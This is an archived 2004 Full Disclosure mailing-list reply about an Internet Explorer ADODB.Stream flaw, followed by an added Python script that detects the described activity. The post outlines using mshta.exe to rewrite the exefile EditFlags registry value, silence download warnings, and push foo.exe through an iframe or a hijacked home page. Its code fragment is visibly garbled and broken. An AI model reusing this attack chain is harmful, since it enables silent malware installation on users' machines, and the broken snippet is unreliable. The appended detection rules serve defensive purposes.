Full Disclosure mailing list archives

Betr.: Re: Fix for IE ADODB.Stream vulnerability is out
From: "http-equiv () excite com" <1 () malware com>
Date: Sat, 3 Jul 2004 02:06:32 -0000

 still have to contend with mshta.exe calling out through the 
iframe and more than likely firewalled long ago, so use it to 
write the registry to kill the download warning, then use it to set 
the browser home page as http://www..../foo.exe, that or the 
default search engine.

tons of possibilities.

Well done Matthew!

obj.ShellExecut("mshta.exe","about:<script>var wsh=new 
('HKCR\exefile\EditFlags', 0x38070000, "REG_BINARY");)
</script><iframe src=foo.exe>");


On quick reflection, I completely missed Matthew's point. It's 
brilliant. If you can indeed kill the download dialog, kill it, 
stick a frame in it and bang. If it doesn't work, use the 
regWrite and re-set the adodb.stream instead, and continue on 
your merry way. 


Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
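
Seen from the detection side, the behaviour discussed in the message above leaves three observable events: mshta.exe started with inline script, a write to the exefile EditFlags value, and a script host changing the browser home page. The following is an added example, not part of the original post; the log layout, the rule names and the Internet Explorer Start Page key path are assumptions, while mshta.exe and HKCR\exefile\EditFlags come from the message.

```python
import re

# Constructed telemetry lines (not from the original post); the key=value
# layout is an assumption, adapt parse() to your EDR or Sysmon export.
SAMPLE_EVENTS = [
    r"type=proc image=C:\Windows\System32\mshta.exe parent=iexplore.exe cmd=mshta.exe about:<script>/*elided*/</script>",
    r"type=proc image=C:\Windows\System32\mshta.exe parent=explorer.exe cmd=mshta.exe C:\tools\inventory.hta",
    # HKCR is a merged view, so the write usually surfaces under ...\Classes
    r"type=reg image=C:\Windows\System32\mshta.exe key=HKLM\SOFTWARE\Classes\exefile\EditFlags valtype=REG_BINARY",
    r"type=reg image=C:\Windows\regedit.exe key=HKCU\Software\Microsoft\Internet Explorer\Main\Start Page valtype=REG_SZ",
    r"type=reg image=C:\Windows\System32\mshta.exe key=HKCU\Software\Microsoft\Internet Explorer\Main\Start Page valtype=REG_SZ",
]

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
FIELD = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")  # values may contain spaces

def parse(line):
    """Split one key=value event line into a dict."""
    return dict(FIELD.findall(line))

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def classify(ev):
    """Return a rule name for a suspicious event, or None."""
    image = basename(ev.get("image", ""))
    if ev.get("type") == "proc" and image == "mshta.exe":
        cmd = ev.get("cmd", "").lower()
        # mshta handed inline markup instead of an .hta file on disk
        if "about:" in cmd or "<script" in cmd:
            return "mshta-inline-script"
    if ev.get("type") == "reg":
        key = ev.get("key", "").lower()
        # any write to exefile EditFlags changes how .exe downloads are handled
        if key.endswith("\\exefile\\editflags"):
            return "exefile-editflags-write"
        if key.endswith("\\internet explorer\\main\\start page") and image in SCRIPT_HOSTS:
            return "homepage-set-by-script-host"
    return None

def detect(lines):
    """Return (line index, rule) for every line that matches a rule."""
    hits = []
    for i, line in enumerate(lines):
        rule = classify(parse(line))
        if rule:
            hits.append((i, rule))
    return hits

if __name__ == "__main__":
    for idx, rule in detect(SAMPLE_EVENTS):
        print(idx, rule)
```

The second and fourth sample lines are benign on purpose: mshta.exe opening an .hta file from disk and regedit.exe editing the Start Page are not flagged.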